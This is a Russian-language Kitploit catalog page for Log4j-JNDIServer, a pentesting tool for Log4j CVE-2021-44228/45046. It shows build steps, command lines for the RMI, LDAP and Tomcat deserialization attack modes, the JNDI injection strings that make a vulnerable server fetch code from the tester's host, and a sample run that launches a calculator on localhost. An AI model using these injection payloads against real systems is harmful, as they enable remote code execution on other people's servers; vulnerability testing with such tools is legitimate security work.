Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4j-JNDIServer — Этот проект поможет протестировать уязвимость Log4j CVE-2021-44228. | Kitploit
Инструменты/GitHubGitHub/immunityinc/log4j-jndiserver
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеИнструмент Удаленного Доступа
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

Этот проект поможет протестировать уязвимость Log4j CVE-2021-44228.

Репозиторий
9244 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4j-JNDIServer

Этот проект поможет протестировать уязвимости Log4j CVE-2021-44228/CVE-2021-45046.

Установка и сборка

  • Загрузите проект в Intellij Idea
  • Выберите JDK в «Projects Settings» (CTRL + ALT + SHIFT + S)
  • В «Project Settings» создайте артефакт: «Artifacts» → «Create JAR from Modules» → в «JAR files from libraries» отметьте «extract to target JAR» → «OK»
  • Соберите проект (CTRL + F9). Это создаст jar-файл в папке /out/artifacts/

Сборка с помощью Maven

Требуется Java 1.8+ и Maven 3.x+

  • mvn clean package -DskipTests
  • Вы найдете .jar файл в папке /target

Использование

1.RMI вектор атаки

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Вам больше не нужно размещать Exploit.class. Приложение запустит HTTP-сервер на указанном порту.

Вы должны указать команду, которую хотите выполнить на цели.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.LDAP вектор атаки

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Вам больше не нужно размещать Exploit.class. Приложение запустит HTTP-сервер на указанном порту.

Вы должны указать команду, которую хотите выполнить на цели.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.Deserialization вектор атаки (с использованием Tomcat payload)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Пример

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
Скачать инструмент